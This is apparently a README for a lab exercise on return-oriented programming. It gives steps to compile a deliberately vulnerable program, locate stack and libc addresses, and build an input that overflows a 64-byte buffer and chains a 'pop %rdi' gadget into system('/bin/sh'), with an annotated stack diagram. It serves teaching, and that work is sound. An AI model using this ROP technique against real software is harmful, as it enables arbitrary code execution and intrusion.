This is based on <https://crypto.stanford.edu/~blynn/rop/>, the
Makefile automates most of this. This has been tested on Debian 10.3
running kernel 4.19.0-8-amd64 and using gcc (Debian 8.3.0-6) 8.3.0.

1. Compile and run the victim code

   make victim
   setarch $(arch) -R ./victim

2. Grab the address where the buffer is located on the stack and
   update the Makefile if necessary

3. Run the victim and use pmap to find the base address of the libc
   text segment, update the Makefile if necessary

   victim &
   pmap $(pgrep victim)

4. Create the attack input

   make attack.bin

   0x0007fffffffe428 |                |   c059 e6f7 ff7f 0000 ------> (system() in libc)
   0x0007fffffffe420 |                |   d0e3 ffff ff7f 0000  ---+
                     +----------------+                           |
   0x0007fffffffe418 | return address |   5f4a e4f7 ff7f 0000  ---|--> (pop %rdi; retq)
                     |----------------|                           |
   0x0007fffffffe410 | saved rbp      |   0000 0000 0000 0000     |
                     |----------------|                           |
   0x0007fffffffe408 |                |   0000 0000 0000 0000     |
   0x0007fffffffe400 |                |   0000 0000 0000 0000     |
   0x0007fffffffe3f8 |                |   0000 0000 0000 0000     |
   0x0007fffffffe3f0 |                |   0000 0000 0000 0000     |
   0x0007fffffffe3e8 | char name[64]  |   0000 0000 0000 0000     |
   0x0007fffffffe3e0 |                |   0000 0000 0000 0000     |
   0x0007fffffffe3d8 |                |   0000 0000 0000 0000     |
   0x0007fffffffe3d0 |                |   2f62 696e 2f73 6800  <--|
                     |----------------|

5. Run the attack

   make attack